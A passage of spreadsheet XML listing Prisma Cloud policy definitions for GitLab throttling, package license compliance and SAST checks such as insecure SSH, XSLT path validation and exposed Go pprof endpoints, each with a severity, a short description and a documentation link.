      <c r="AB296" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC296" t="inlineStr"/>
      <c r="AD296" t="b">
        <v>1</v>
      </c>
      <c r="AE296" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF296" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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6" t="inlineStr">
        <is>
          <t>eee07e5f-52dc-41cc-b703-27bc8159e5a5</t>
        </is>
      </c>
      <c r="AI296" t="inlineStr"/>
      <c r="AJ296" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK296" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" t="inlineStr"/>
      <c r="B297" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C297" s="2" t="inlineStr"/>
      <c r="D297" t="inlineStr"/>
      <c r="E297" t="inlineStr"/>
      <c r="F297" t="inlineStr"/>
      <c r="G297" t="b">
        <v>1</v>
      </c>
      <c r="H2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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J297" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="K297" t="inlineStr">
        <is>
          <t>Throttling is not enabled in GitLab</t>
        </is>
      </c>
      <c r="L297" t="inlineStr"/>
      <c r="M297" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N297" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O297" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P297" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q297" t="inlineStr"/>
      <c r="R297" t="inlineStr"/>
      <c r="S297" t="inlineStr"/>
      <c r="T297" t="b">
        <v>0</v>
      </c>
      <c r="U297" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V297" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="W297" t="inlineStr">
        <is>
          <t>Throttling is a technique used to limit the number of requests done by a user in a certain period. GitLab offers an inherent throttling mechanism in its self-managed instances to limit the number of requests sent to its API. However this setting is not applied on the instance. An attacker with access to GitLab can abuse its API to find sensitive files, to check the accessibility of administrative pages, or to overload the instance resources.</t>
        </is>
      </c>
      <c r="X297" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-throttle-disabled</t>
        </is>
      </c>
      <c r="Y297" t="inlineStr"/>
      <c r="Z297" t="inlineStr">
        <is>
          <t>{"category":"System Configuration","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA297" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB297" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC297" t="inlineStr"/>
      <c r="AD297" t="b">
        <v>1</v>
      </c>
      <c r="AE297" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF297" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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7" t="inlineStr">
        <is>
          <t>ecc6abc1-4e6a-4ed9-a8c8-3d45481fd874</t>
        </is>
      </c>
      <c r="AI297" t="inlineStr"/>
      <c r="AJ297" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK297" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" t="inlineStr"/>
      <c r="B298" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C298" s="2" t="inlineStr"/>
      <c r="D298" t="inlineStr"/>
      <c r="E298" t="inlineStr"/>
      <c r="F298" t="inlineStr"/>
      <c r="G298" t="b">
        <v>1</v>
      </c>
      <c r="H2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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J298" t="inlineStr">
        <is>
          <t>Code:Licenses:</t>
        </is>
      </c>
      <c r="K298" t="inlineStr">
        <is>
          <t>Weak Copyleft Licenses</t>
        </is>
      </c>
      <c r="L298" t="inlineStr"/>
      <c r="M298" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N298" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O298" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P298" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q298" t="inlineStr"/>
      <c r="R298" t="inlineStr"/>
      <c r="S298" t="inlineStr"/>
      <c r="T298" t="b">
        <v>0</v>
      </c>
      <c r="U298" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V298" t="inlineStr">
        <is>
          <t>Code:Licenses:</t>
        </is>
      </c>
      <c r="W298" t="inlineStr">
        <is>
          <t>This policy identifies software packages distributed under weak copyleft licenses. Weak copyleft licenses permit combining code with other licenses, including proprietary licenses, without mandating the entire derivative work to be released under the same copyleft license.</t>
        </is>
      </c>
      <c r="X298" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/license-policies/weak-copyleft-licenses</t>
        </is>
      </c>
      <c r="Y298" t="inlineStr"/>
      <c r="Z298" t="inlineStr">
        <is>
          <t>{"category":"Licenses","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA298" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB298" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC298" t="inlineStr"/>
      <c r="AD298" t="b">
        <v>1</v>
      </c>
      <c r="AE298" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF298" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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 t="inlineStr">
        <is>
          <t>ee2b753a-0c21-4c09-befa-4b6d6f48a4af</t>
        </is>
      </c>
      <c r="AI298" t="inlineStr"/>
      <c r="AJ298" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK298" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" t="inlineStr"/>
      <c r="B299" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C299" s="2" t="inlineStr"/>
      <c r="D299" t="inlineStr"/>
      <c r="E299" t="inlineStr"/>
      <c r="F299" t="inlineStr"/>
      <c r="G299" t="b">
        <v>1</v>
      </c>
      <c r="H2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9" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J299" t="inlineStr">
        <is>
          <t>Code:Licenses:</t>
        </is>
      </c>
      <c r="K299" t="inlineStr">
        <is>
          <t>Non Permissive Licenses</t>
        </is>
      </c>
      <c r="L299" t="inlineStr"/>
      <c r="M299" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N299" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O299" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P299" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q299" t="inlineStr"/>
      <c r="R299" t="inlineStr"/>
      <c r="S299" t="inlineStr"/>
      <c r="T299" t="b">
        <v>0</v>
      </c>
      <c r="U299" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V299" t="inlineStr">
        <is>
          <t>Code:Licenses:</t>
        </is>
      </c>
      <c r="W299" t="inlineStr">
        <is>
          <t>This policy identifies software packages distributed under non-permissive or restrictive licenses. Non-permissive licenses impose strict conditions on the use, modification, and distribution of software.</t>
        </is>
      </c>
      <c r="X299" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/license-policies/non-permissive-licenses</t>
        </is>
      </c>
      <c r="Y299" t="inlineStr"/>
      <c r="Z299" t="inlineStr">
        <is>
          <t>{"category":"Licenses","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA299" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB299" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC299" t="inlineStr"/>
      <c r="AD299" t="b">
        <v>1</v>
      </c>
      <c r="AE299" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF299" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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9" t="inlineStr">
        <is>
          <t>a0dea5f8-51ba-44be-b82d-597cd9bc7a89</t>
        </is>
      </c>
      <c r="AI299" t="inlineStr"/>
      <c r="AJ299" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK299" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" t="inlineStr"/>
      <c r="B300" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C300" s="2" t="inlineStr"/>
      <c r="D300" t="inlineStr"/>
      <c r="E300" t="inlineStr"/>
      <c r="F300" t="inlineStr"/>
      <c r="G300" t="b">
        <v>1</v>
      </c>
      <c r="H3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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J300" t="inlineStr">
        <is>
          <t>Code:Licenses:</t>
        </is>
      </c>
      <c r="K300" t="inlineStr">
        <is>
          <t>This package use a non-SPDX, unrecognized, or private open-source license</t>
        </is>
      </c>
      <c r="L300" t="inlineStr"/>
      <c r="M300" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N300" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O300" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P300" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q300" t="inlineStr"/>
      <c r="R300" t="inlineStr"/>
      <c r="S300" t="inlineStr"/>
      <c r="T300" t="b">
        <v>0</v>
      </c>
      <c r="U300" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V300" t="inlineStr">
        <is>
          <t>Code:Licenses:</t>
        </is>
      </c>
      <c r="W300" t="inlineStr">
        <is>
          <t>Ensure package licenses are known or SPDX recognized.</t>
        </is>
      </c>
      <c r="X300" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/content-collections/application-security/risk-management/monitor-and-manage-code-build/software-composition-analysis/license-compliance-in-sca</t>
        </is>
      </c>
      <c r="Y300" t="inlineStr"/>
      <c r="Z300" t="inlineStr">
        <is>
          <t>{"category":"Licenses","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA300" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB300" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC300" t="inlineStr">
        <is>
          <t>BC_LIC_2</t>
        </is>
      </c>
      <c r="AD300" t="b">
        <v>1</v>
      </c>
      <c r="AE300" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF300" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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 t="inlineStr">
        <is>
          <t>441799aa-ecf6-4cbc-bec4-95df5a940f81</t>
        </is>
      </c>
      <c r="AI300" t="inlineStr"/>
      <c r="AJ300" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK300" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" t="inlineStr"/>
      <c r="B301" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C301" s="2" t="inlineStr"/>
      <c r="D301" t="inlineStr"/>
      <c r="E301" t="inlineStr"/>
      <c r="F301" t="inlineStr"/>
      <c r="G301" t="b">
        <v>1</v>
      </c>
      <c r="H3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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J301" t="inlineStr">
        <is>
          <t>Code:Licenses:</t>
        </is>
      </c>
      <c r="K301" t="inlineStr">
        <is>
          <t>Package contains a license that is not OSI-approved</t>
        </is>
      </c>
      <c r="L301" t="inlineStr"/>
      <c r="M301" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N301" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O301" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P301" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q301" t="inlineStr"/>
      <c r="R301" t="inlineStr"/>
      <c r="S301" t="inlineStr"/>
      <c r="T301" t="b">
        <v>0</v>
      </c>
      <c r="U301" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V301" t="inlineStr">
        <is>
          <t>Code:Licenses:</t>
        </is>
      </c>
      <c r="W301" t="inlineStr">
        <is>
          <t>Ensure open source packages have OSI-approved licenses</t>
        </is>
      </c>
      <c r="X301" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/content-collections/application-security/risk-management/monitor-and-manage-code-build/software-composition-analysis/license-compliance-in-sca</t>
        </is>
      </c>
      <c r="Y301" t="inlineStr"/>
      <c r="Z301" t="inlineStr">
        <is>
          <t>{"category":"Licenses","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA301" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB301" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC301" t="inlineStr">
        <is>
          <t>BC_LIC_1</t>
        </is>
      </c>
      <c r="AD301" t="b">
        <v>1</v>
      </c>
      <c r="AE301" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF301" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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 t="inlineStr">
        <is>
          <t>590b6ec1-5c24-4fab-bd68-682fbf4a9e6a</t>
        </is>
      </c>
      <c r="AI301" t="inlineStr"/>
      <c r="AJ301" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK301" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" t="inlineStr"/>
      <c r="B302" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C302" s="2" t="inlineStr"/>
      <c r="D302" t="inlineStr"/>
      <c r="E302" t="inlineStr"/>
      <c r="F302" t="inlineStr"/>
      <c r="G302" t="b">
        <v>1</v>
      </c>
      <c r="H3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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J302" t="inlineStr">
        <is>
          <t>Code:Licenses:</t>
        </is>
      </c>
      <c r="K302" t="inlineStr">
        <is>
          <t>Strong Copyleft Licenses</t>
        </is>
      </c>
      <c r="L302" t="inlineStr"/>
      <c r="M302" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N302" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O302" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P302" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q302" t="inlineStr"/>
      <c r="R302" t="inlineStr"/>
      <c r="S302" t="inlineStr"/>
      <c r="T302" t="b">
        <v>0</v>
      </c>
      <c r="U302" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V302" t="inlineStr">
        <is>
          <t>Code:Licenses:</t>
        </is>
      </c>
      <c r="W302" t="inlineStr">
        <is>
          <t>This policy identifies software packages distributed under strong copyleft licenses, such as the GNU General Public License (GPL). Strong copyleft licenses require derivative works to be distributed under the same copyleft license terms as the original work.</t>
        </is>
      </c>
      <c r="X302" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/license-policies/strong-copyleft-licenses</t>
        </is>
      </c>
      <c r="Y302" t="inlineStr"/>
      <c r="Z302" t="inlineStr">
        <is>
          <t>{"category":"Licenses","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA302" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB302" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC302" t="inlineStr"/>
      <c r="AD302" t="b">
        <v>1</v>
      </c>
      <c r="AE302" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF302" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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2" t="inlineStr">
        <is>
          <t>3112fbce-cc30-4d03-a5b2-22f84953a80f</t>
        </is>
      </c>
      <c r="AI302" t="inlineStr"/>
      <c r="AJ302" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK302" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" t="inlineStr"/>
      <c r="B303" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C303" s="2" t="inlineStr"/>
      <c r="D303" t="inlineStr"/>
      <c r="E303" t="inlineStr"/>
      <c r="F303" t="inlineStr"/>
      <c r="G303" t="b">
        <v>1</v>
      </c>
      <c r="H3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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J303" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K303" t="inlineStr">
        <is>
          <t>Insecure SSH</t>
        </is>
      </c>
      <c r="L303" t="inlineStr"/>
      <c r="M303" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N303" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O303" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P303" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q303" t="inlineStr"/>
      <c r="R303" t="inlineStr"/>
      <c r="S303" t="inlineStr"/>
      <c r="T303" t="b">
        <v>0</v>
      </c>
      <c r="U303" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V303" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W303" t="inlineStr">
        <is>
          <t>Avoid ssh insecure ignore host key</t>
        </is>
      </c>
      <c r="X303" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-198</t>
        </is>
      </c>
      <c r="Y303" t="inlineStr"/>
      <c r="Z303" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA303" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB303" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC303" t="inlineStr">
        <is>
          <t>CKV3_SAST_198</t>
        </is>
      </c>
      <c r="AD303" t="b">
        <v>1</v>
      </c>
      <c r="AE303" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF303" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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 t="inlineStr">
        <is>
          <t>1e6e8fa3-41f4-464a-969e-8a23917724e7</t>
        </is>
      </c>
      <c r="AI303" t="inlineStr"/>
      <c r="AJ303" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK303" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" t="inlineStr"/>
      <c r="B304" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C304" s="2" t="inlineStr"/>
      <c r="D304" t="inlineStr"/>
      <c r="E304" t="inlineStr"/>
      <c r="F304" t="inlineStr"/>
      <c r="G304" t="b">
        <v>1</v>
      </c>
      <c r="H3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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J304" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K304" t="inlineStr">
        <is>
          <t>Missing validation for paths when processing style sheets</t>
        </is>
      </c>
      <c r="L304" t="inlineStr"/>
      <c r="M304" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N304" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O304" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P304" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q304" t="inlineStr"/>
      <c r="R304" t="inlineStr"/>
      <c r="S304" t="inlineStr"/>
      <c r="T304" t="b">
        <v>0</v>
      </c>
      <c r="U304" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V304" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W304" t="inlineStr">
        <is>
          <t>It is possible to attach malicious behavior to those style sheets. Therefore, if an attacker can control the content or the source of the style sheet, he might be able to trigger remote code execution.</t>
        </is>
      </c>
      <c r="X304" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-47</t>
        </is>
      </c>
      <c r="Y304" t="inlineStr"/>
      <c r="Z304" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA304" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB304" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC304" t="inlineStr">
        <is>
          <t>CKV3_SAST_47</t>
        </is>
      </c>
      <c r="AD304" t="b">
        <v>1</v>
      </c>
      <c r="AE304" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF304" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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 t="inlineStr">
        <is>
          <t>13f2be85-d6af-40cc-8e57-18c174efcca1</t>
        </is>
      </c>
      <c r="AI304" t="inlineStr"/>
      <c r="AJ304" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK304" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" t="inlineStr"/>
      <c r="B305" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C305" s="2" t="inlineStr"/>
      <c r="D305" t="inlineStr"/>
      <c r="E305" t="inlineStr"/>
      <c r="F305" t="inlineStr"/>
      <c r="G305" t="b">
        <v>1</v>
      </c>
      <c r="H3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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J305" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K305" t="inlineStr">
        <is>
          <t>Incorrect type conversion or cast</t>
        </is>
      </c>
      <c r="L305" t="inlineStr"/>
      <c r="M305" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N305" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O305" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P305" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q305" t="inlineStr"/>
      <c r="R305" t="inlineStr"/>
      <c r="S305" t="inlineStr"/>
      <c r="T305" t="b">
        <v>0</v>
      </c>
      <c r="U305" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V305" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W305" t="inlineStr">
        <is>
          <t>The application is using `Integer.toHexString` on a digest array buffer which may lead to an incorrect version of values. Consider using the `HexFormat` object introduced in Java 17. For older Java applications consider using the `javax.xml.bind.DatatypeConverter`.</t>
        </is>
      </c>
      <c r="X305" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-136</t>
        </is>
      </c>
      <c r="Y305" t="inlineStr"/>
      <c r="Z305" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA305" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB305" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC305" t="inlineStr">
        <is>
          <t>CKV3_SAST_136</t>
        </is>
      </c>
      <c r="AD305" t="b">
        <v>1</v>
      </c>
      <c r="AE305" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF305" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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 t="inlineStr">
        <is>
          <t>c15b0d23-aa93-4531-91d2-7643190bd971</t>
        </is>
      </c>
      <c r="AI305" t="inlineStr"/>
      <c r="AJ305" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK305" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" t="inlineStr"/>
      <c r="B306" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C306" s="2" t="inlineStr"/>
      <c r="D306" t="inlineStr"/>
      <c r="E306" t="inlineStr"/>
      <c r="F306" t="inlineStr"/>
      <c r="G306" t="b">
        <v>1</v>
      </c>
      <c r="H3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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J306" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K306" t="inlineStr">
        <is>
          <t>Usage of profiling endpoint in production</t>
        </is>
      </c>
      <c r="L306" t="inlineStr"/>
      <c r="M306" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N306" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O306" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P306" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q306" t="inlineStr"/>
      <c r="R306" t="inlineStr"/>
      <c r="S306" t="inlineStr"/>
      <c r="T306" t="b">
        <v>0</v>
      </c>
      <c r="U306" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V306" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W306" t="inlineStr">
        <is>
          <t>This policy detects the use of Go's built-in profiling service by identifying imports of net/http/pprof. The /debug/pprof endpoint, enabled by this import, does not require authentication and can be accessed by anonymous users, potentially leaking sensitive information. It is recommended to remove the net/http/pprof import to prevent this profiling endpoint from being enabled in production environments.</t>
        </is>
      </c>
      <c r="X306" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-259</t>
        </is>
      </c>
      <c r="Y306" t="inlineStr"/>
      <c r="Z306" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA306" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB306" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC306" t="inlineStr">
        <is>
          <t>CKV3_SAST_259</t>
        </is>
      </c>
      <c r="AD306" t="b">
        <v>1</v>
      </c>
      <c r="AE306" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF306" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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6" t="inlineStr">
        <is>
          <t>0c21772a-2ad5-4496-8cfe-28a5b80e7eef</t>
        </is>
      </c>
      <c r="AI306" t="inlineStr"/>
      <c r="AJ306" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK306" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" t="inlineStr"/>
      <c r="B307" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C307" s="2" t="inlineStr"/>
      <c r="D307" t="inlineStr"/>
      <c r="E307" t="inlineStr"/>
      <c r="F307" t="inlineStr"/>
      <c r="G307" t="b">
        <v>1</v>
      </c>
      <c r="H3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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J307" t="inlineStr">
        <is>
